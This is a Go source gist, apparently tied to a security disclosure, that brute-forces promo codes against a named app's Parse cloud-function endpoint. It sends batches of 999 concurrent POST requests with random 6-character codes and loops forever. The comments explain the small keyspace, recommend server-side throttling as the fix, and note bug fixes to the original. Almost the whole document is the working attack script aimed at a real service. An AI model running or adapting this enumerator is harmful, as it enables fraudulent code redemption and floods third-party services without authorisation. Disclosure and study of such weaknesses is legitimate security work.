Created
February 27, 2016 01:24
simple golang bruteforcer
// Used something like this in a disclosure to sauceyapp.com regarding brute-forcing.
package main | |
import ( | |
"bytes" | |
"fmt" | |
"io/ioutil" | |
"math/rand" | |
"net/http" | |
"sync" | |
"time" | |
) | |
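// req submits one randomly generated 6-character promo code to the applyCode
// cloud function and prints the response body.
//
// The code is drawn from a 36-symbol alphabet, so the whole space is 36^6
// (roughly 2.2 billion) values. The disclosure point this illustrates is that
// a short code checked by an endpoint with no server-side attempt limiting can
// be enumerated; the remedy belongs on the server (per-client and per-account
// throttling, longer codes), not in the client.
//
// Errors are printed and the call returns; nothing is reported to the caller.
func req() {
	const letterBytes = "abcdefghijklmnopqrstuvwxyz1234567890"
	b := make([]byte, 6)
	for i := range b {
		b[i] = letterBytes[rand.Intn(len(letterBytes))]
	}

	url := "https://api.parse.com/1/functions/applyCode"
	// b only ever holds characters from letterBytes, so splicing it into the
	// JSON literal cannot break the document structure.
	jsonStr := []byte(`{"promoCode":"` + string(b) + `","_ApplicationId":"","_JavaScriptKey":"","_ClientVersion":"js1.3.4","_InstallationId":"","_SessionToken":""}`)

	request, err := http.NewRequest("POST", url, bytes.NewBuffer(jsonStr))
	if err != nil {
		// The original overwrote this error with the one from client.Do.
		fmt.Println(err.Error())
		return
	}
	request.Header.Set("X-Custom-Header", "myvalue")
	request.Header.Set("Content-Type", "application/json")

	// A zero-value http.Client has no timeout, so one stalled connection
	// would keep the caller's WaitGroup from ever completing.
	client := &http.Client{Timeout: 30 * time.Second}
	resp, err := client.Do(request)
	if err != nil {
		fmt.Println(err.Error())
		// resp is nil on error; the original fell through to
		// resp.Body.Close() and panicked with a nil pointer dereference.
		return
	}
	defer resp.Body.Close()

	body, err := ioutil.ReadAll(resp.Body)
	if err != nil {
		fmt.Println(err.Error())
		return
	}
	// The original labelled this output "response Headers:" although it
	// prints the body.
	fmt.Println("response Body:", string(body))
}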
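// main repeatedly launches a batch of 999 concurrent req calls, waits for the
// whole batch to finish, sleeps for 60 seconds, and starts over. It never
// returns.
func main() {
	for {
		var wg sync.WaitGroup
		for i := 1; i < 1000; i++ {
			// Add must happen before the goroutine is started. The original
			// called wg.Add(1) inside the goroutine, which races with
			// wg.Wait(): Wait could observe a zero counter and return before
			// any goroutine had registered itself.
			wg.Add(1)
			go func() {
				defer wg.Done()
				req()
			}()
			// TODO(whoever)
			// https://godoc.org/?q=rate+limit
			// maybe wait here for say second/1000, use time.Ticker, but prefer to use a token bucket implementation
		}
		wg.Wait()
		time.Sleep(60 * time.Second)
	}
}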